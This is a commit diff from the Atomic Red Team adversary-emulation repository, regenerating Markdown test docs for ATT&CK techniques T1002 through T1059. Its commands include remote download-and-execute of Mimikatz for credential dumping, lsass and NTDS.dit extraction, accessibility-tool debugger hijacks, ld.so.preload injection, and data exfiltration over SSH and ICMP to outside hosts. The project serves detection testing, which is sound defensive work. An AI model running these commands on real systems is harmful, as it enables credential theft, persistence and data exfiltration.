security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2019-08-29 22:18:28 +00:00
parent 9f535f0547
commit 75c332ac52
140 changed files with 384 additions and 764 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1002/T1002.md
+5 -10
View File
@@ -29,8 +29,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_file | Path that should be compressed into our output file | Path | C:\*|
| output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
<br/>
@@ -48,8 +47,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_file | Path that should be compressed into our output file | Path | *.docx|
| output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
rar a -r #{output_file} #{input_file}
```
<br/>
@@ -67,8 +65,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*|
| output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
zip #{output_file} #{input_files}
```
<br/>
@@ -85,8 +82,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
|------|-------------|------|---------------|
| input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
gzip -f #{input_file}
```
<br/>
@@ -104,8 +100,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_file_folder | Path that should be compressed | Path | /tmp/victim-files/|
| output_file | File that should be output | Path | /tmp/victim-files.tar.gz|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
tar -cvzf #{output_file} #{input_file_folder}
```
<br/>
atomics/T1003/T1003.md
+10 -20
View File
@@ -169,8 +169,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
@@ -182,8 +181,7 @@ https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
gsecdump -a
```
<br/>
@@ -200,8 +198,7 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/
|------|-------------|------|---------------|
| output_file | Path where resulting data should be placed | Path | output.txt|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
wce -o #{output_file}
```
<br/>
@@ -214,8 +211,7 @@ via three registry keys. Then processed locally using https://github.com/Neohaps
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
@@ -235,8 +231,7 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
procdump.exe -accepteula -ma lsass.exe #{output_file}
```
<br/>
@@ -249,8 +244,7 @@ Manager and administrative permissions.
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Task Manager:
#### Run it with these steps! 1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
@@ -277,8 +271,7 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
|------|-------------|------|---------------|
| input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
#### Run it with these steps!
1. Open Mimikatz:
#### Run it with these steps! 1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
2. Select a Memory Dump:
@@ -304,8 +297,7 @@ subsequent domain controllers without the need of network-based replication.
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
```
<br/>
@@ -322,8 +314,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
vssadmin.exe create shadow /for=#{drive_letter}
```
<br/>
@@ -345,8 +336,7 @@ This test must be executed on a Windows Domain Controller.
| vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | Path | C:\Extract|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
atomics/T1004/T1004.md
+3 -6
View File
@@ -32,8 +32,7 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
<br/>
@@ -50,8 +49,7 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```
<br/>
@@ -68,8 +66,7 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
```
atomics/T1005/T1005.md
+1 -2
View File
@@ -22,8 +22,7 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified
|------|-------------|------|---------------|
| search_string | String to search Safari cookies to find. | string | coinbase|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
```
atomics/T1007/T1007.md
+2 -4
View File
@@ -22,8 +22,7 @@ Identify system services
|------|-------------|------|---------------|
| service_name | Name of service to start stop, query | string | svchost.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
tasklist.exe
sc query
sc query state= all
@@ -45,8 +44,7 @@ Enumerates started system services using net.exe and writes them to a file. This
|------|-------------|------|---------------|
| output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
net.exe start >> #{output_file}
```
<br/>
atomics/T1009/T1009.md
+1 -2
View File
@@ -20,8 +20,7 @@ Uses dd to add a zero to the binary to change the hash
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
```
<br/>
atomics/T1010/T1010.md
+1 -2
View File
@@ -23,8 +23,7 @@ Compiles and executes C# code to list main window titles associated with each pr
| input_source_code | Path to source of C# code | path | C:\AtomicRedTeam\atomics\T1010\src\T1010.cs|
| output_file_name | Name of output binary | string | T1010.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
```
atomics/T1012/T1012.md
+1 -2
View File
@@ -28,8 +28,7 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
atomics/T1014/T1014.md
+3 -6
View File
@@ -26,8 +26,7 @@ Loadable Kernel Module based Rootkit
|------|-------------|------|---------------|
| rootkit_file | Path To Module | String | Module.ko|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
sudo insmod #{rootkit_file}
```
<br/>
@@ -44,8 +43,7 @@ Loadable Kernel Module based Rootkit
|------|-------------|------|---------------|
| rootkit_file | Path To Module | String | Module.ko|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
sudo modprobe #{rootkit_file}
```
<br/>
@@ -69,8 +67,7 @@ It would be wise if you only run this in a test environment
|------|-------------|------|---------------|
| driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
puppetstrings #{driver_path}
```
<br/>
atomics/T1015/T1015.md
+7 -14
View File
@@ -48,8 +48,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | osk.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
@@ -66,8 +65,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | sethc.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
@@ -84,8 +82,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | utilman.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
@@ -102,8 +99,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | magnify.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
@@ -120,8 +116,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | narrator.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
@@ -138,8 +133,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
@@ -156,8 +150,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
atomics/T1016/T1016.md
+2 -4
View File
@@ -17,8 +17,7 @@ Identify network configuration information
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
ipconfig /all
netsh interface show
arp -a
@@ -34,8 +33,7 @@ Identify network configuration information
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
arp -a
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
ifconfig
atomics/T1018/T1018.md
+5 -10
View File
@@ -35,8 +35,7 @@ Identify remote systems with net.exe
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
net view /domain
net view
```
@@ -49,8 +48,7 @@ Identify remote systems via ping sweep
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
```
<br/>
@@ -62,8 +60,7 @@ Identify remote systems via arp
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
arp -a
```
<br/>
@@ -75,8 +72,7 @@ Identify remote systems via arp
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
arp -a | grep -v '^?'
```
<br/>
@@ -88,8 +84,7 @@ Identify remote systems via ping sweep
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
```
<br/>
atomics/T1022/T1022.md
+4 -8
View File
@@ -23,8 +23,7 @@ Encrypt data for exiltration
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
echo "This file will be encrypted" > /tmp/victim-gpg.txt
mkdir /tmp/victim-files
cd /tmp/victim-files
@@ -44,8 +43,7 @@ rar a -p"blue" hello.rar (VARIANT)
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
@@ -62,8 +60,7 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT)
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
path=%path%;"C:\Program Files (x86)\winzip"
mkdir ./tmp/victim-files
cd ./tmp/victim-files
@@ -80,8 +77,7 @@ Note: Requires 7zip installation
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
atomics/T1027/T1027.md
+1 -2
View File
@@ -23,8 +23,7 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
chmod +x /tmp/art.sh
atomics/T1028/T1028.md
+5 -10
View File
@@ -23,8 +23,7 @@ Powershell Enable WinRM
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Enable-PSRemoting -Force
```
<br/>
@@ -45,8 +44,7 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | computer1|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
<br/>
@@ -65,8 +63,7 @@ Utilize WMIC to start remote process
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
```
<br/>
@@ -85,8 +82,7 @@ Utilize psexec to start remote process
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
psexec \\host -u domain\user -p password -s cmd.exe
```
<br/>
@@ -104,8 +100,7 @@ Execute Invoke-command on remote host
| host_name | Remote Windows Host Name | String | Test|
| remote_command | Command to execute on remote Host | String | ipconfig|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
```
<br/>
atomics/T1030/T1030.md
+1 -2
View File
@@ -15,8 +15,7 @@ Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
cd /tmp/
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
split -b 5000000 /tmp/victim-whole-file
atomics/T1031/T1031.md
+1 -2
View File
@@ -20,8 +20,7 @@ and will then revert the binPath change, restoring Fax to its original state.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
sc start Fax
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
atomics/T1033/T1033.md
+2 -4
View File
@@ -32,8 +32,7 @@ Identify System owner or users on an endpoint
|------|-------------|------|---------------|
| computer_name | Name of remote computer | string | computer1|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
@@ -52,8 +51,7 @@ Identify System owner or users on an endpoint
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
users
w
who
atomics/T1035/T1035.md
+1 -2
View File
@@ -21,8 +21,7 @@ Creates a service specifying an aribrary command and executes it. When executing
| service_name | Name of service to create | string | ARTService|
| executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
sc.exe create #{service_name} binPath= #{executable_command}
sc.exe start #{service_name}
sc.exe delete #{service_name}
atomics/T1036/T1036.md
+2 -4
View File
@@ -31,8 +31,7 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
```
@@ -45,8 +44,7 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro
**Supported Platforms:** Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
cp /bin/sh /tmp/crond
/tmp/crond
```
atomics/T1037/T1037.md
+2 -4
View File
@@ -30,8 +30,7 @@ Added Via Reg.exe
|------|-------------|------|---------------|
| script_command | Command To Execute | String | cmd.exe /c calc.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}"
```
<br/>
@@ -43,8 +42,7 @@ Mac logon script
**Supported Platforms:** macOS
#### Run it with these steps!
1. Create the required plist file
#### Run it with these steps! 1. Create the required plist file
sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
atomics/T1040/T1040.md
+4 -8
View File
@@ -30,8 +30,7 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | ens33|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
```
@@ -49,8 +48,7 @@ Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCP
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | en0A|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
```
@@ -69,8 +67,7 @@ installed, along with WinPCAP. Windump will require the windump executable.
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet0|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5
c:\windump.exe
```
@@ -89,8 +86,7 @@ installed, along with WinPCAP. Windump will require the windump executable.
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet0|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5
c:\windump.exe
```
atomics/T1042/T1042.md
+1 -2
View File
@@ -28,8 +28,7 @@ Change Default File Association From cmd.exe
| extension_to_change | File Extension To Hijack | String | .wav|
| target_exenstion_handler | Thing To Open | Path | C:\Program Files\Windows Media Player\wmplayer.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
```
<br/>
atomics/T1046/T1046.md
+2 -4
View File
@@ -17,8 +17,7 @@ Scan ports to check for listening ports
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
for port in {1..65535};
do
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
@@ -40,8 +39,7 @@ Scan ports to check for listening ports with Nmap.
| port | Ports to scan. | string | 80|
| host | Host to scan. | string | 192.168.1.1|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
atomics/T1047/T1047.md
+4 -8
View File
@@ -23,8 +23,7 @@ WMI List User Accounts
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
wmic useraccount get /ALL
```
<br/>
@@ -36,8 +35,7 @@ WMI List Processes
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
wmic process get caption,executablepath,commandline
```
<br/>
@@ -49,8 +47,7 @@ WMI List Software
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
wmic qfe get description,installedOn /format:csv
```
<br/>
@@ -68,8 +65,7 @@ WMI List Remote Services
| node | Ip Address | String | 192.168.0.1|
| service_search_string | Name Of Service | String | sql server|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%")
```
<br/>
atomics/T1048/T1048.md
+4 -8
View File
@@ -30,8 +30,7 @@ Remote to Local
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
```
<br/>
@@ -52,8 +51,7 @@ Local to Remote
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
```
<br/>
@@ -65,8 +63,7 @@ A firewall rule (iptables or firewalld) will be needed to allow exfiltration on
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
#### Run it with these steps!
1. Victim System Configuration:
#### Run it with these steps! 1. Victim System Configuration:
mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
@@ -96,8 +93,7 @@ Exfiltration of specified file over ICMP protocol.
| input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe|
| ip_address | Destination IP address where the data should be sent. | String | 1.1.1.1|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
```
<br/>
atomics/T1049/T1049.md
+3 -6
View File
@@ -27,8 +27,7 @@ Get a listing of network connections.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
netstat
net use
net sessions
@@ -42,8 +41,7 @@ Get a listing of network connections.
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Get-NetTCPConnection
```
<br/>
@@ -55,8 +53,7 @@ Get a listing of network connections.
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
netstat
who -a
```
atomics/T1050/T1050.md
+2 -4
View File
@@ -25,8 +25,7 @@ Installs A Local Service
| binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
sc.exe stop #{service_name}
@@ -47,8 +46,7 @@ Installs A Local Service via PowerShell
| binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
Stop-Service -Name "#{service_name}"
atomics/T1053/T1053.md
+3 -6
View File
@@ -22,8 +22,7 @@ Note: deprecated in Windows 8+
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
at 13:20 /interactive cmd
```
<br/>
@@ -40,8 +39,7 @@ at 13:20 /interactive cmd
| task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
| time | What time 24 Hour | String | 72600|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
```
<br/>
@@ -62,8 +60,7 @@ Create a task on a remote system
| user_name | Username DOMAIN\User | String | DOMAIN\user|
| password | Password | String | At0micStrong|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
```
<br/>
atomics/T1055/T1055.md
+4 -8
View File
@@ -48,8 +48,7 @@ Windows 10 Utility To Inject DLLS
| dll_payload | DLL to Inject | Path | C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll|
| process_id | PID of input_arguments | Int | $pid|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
mavinject $pid /INJECTRUNNING #{dll_payload}
```
<br/>
@@ -67,8 +66,7 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/
| dll_payload | DLL to Inject | Path | T1055.dll|
| process_id | PID of input_arguments | Int | $pid|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
```
<br/>
@@ -85,8 +83,7 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter
|------|-------------|------|---------------|
| path_to_shared_library | Path to a shared library object | Path | /tmp/evil_module.so|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
echo #{path_to_shared_library} > /etc/ld.so.preload
```
<br/>
@@ -110,8 +107,7 @@ Excercises Five Techniques
|------|-------------|------|---------------|
| exe_binary | Output Binary | Path | T1055.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
.\bin\#{exe_binary}
```
<br/>
atomics/T1056/T1056.md
+1 -2
View File
@@ -28,8 +28,7 @@ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/ma
|------|-------------|------|---------------|
| filepath | Name of the local file, include path. | Path | c:\key.log|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
.\Get-Keystrokes.ps1 -LogPath #{filepath}
```
<br/>
atomics/T1057/T1057.md
+1 -2
View File
@@ -28,8 +28,7 @@ Utilize ps to identify processes
|------|-------------|------|---------------|
| output_file | path of output file | path | /tmp/loot.txt|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
ps >> #{output_file}
ps aux >> #{output_file}
```
atomics/T1059/T1059.md
+1 -2
View File
@@ -19,8 +19,7 @@ This will download the specified payload and set a marker file in `/tmp/art-fish
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
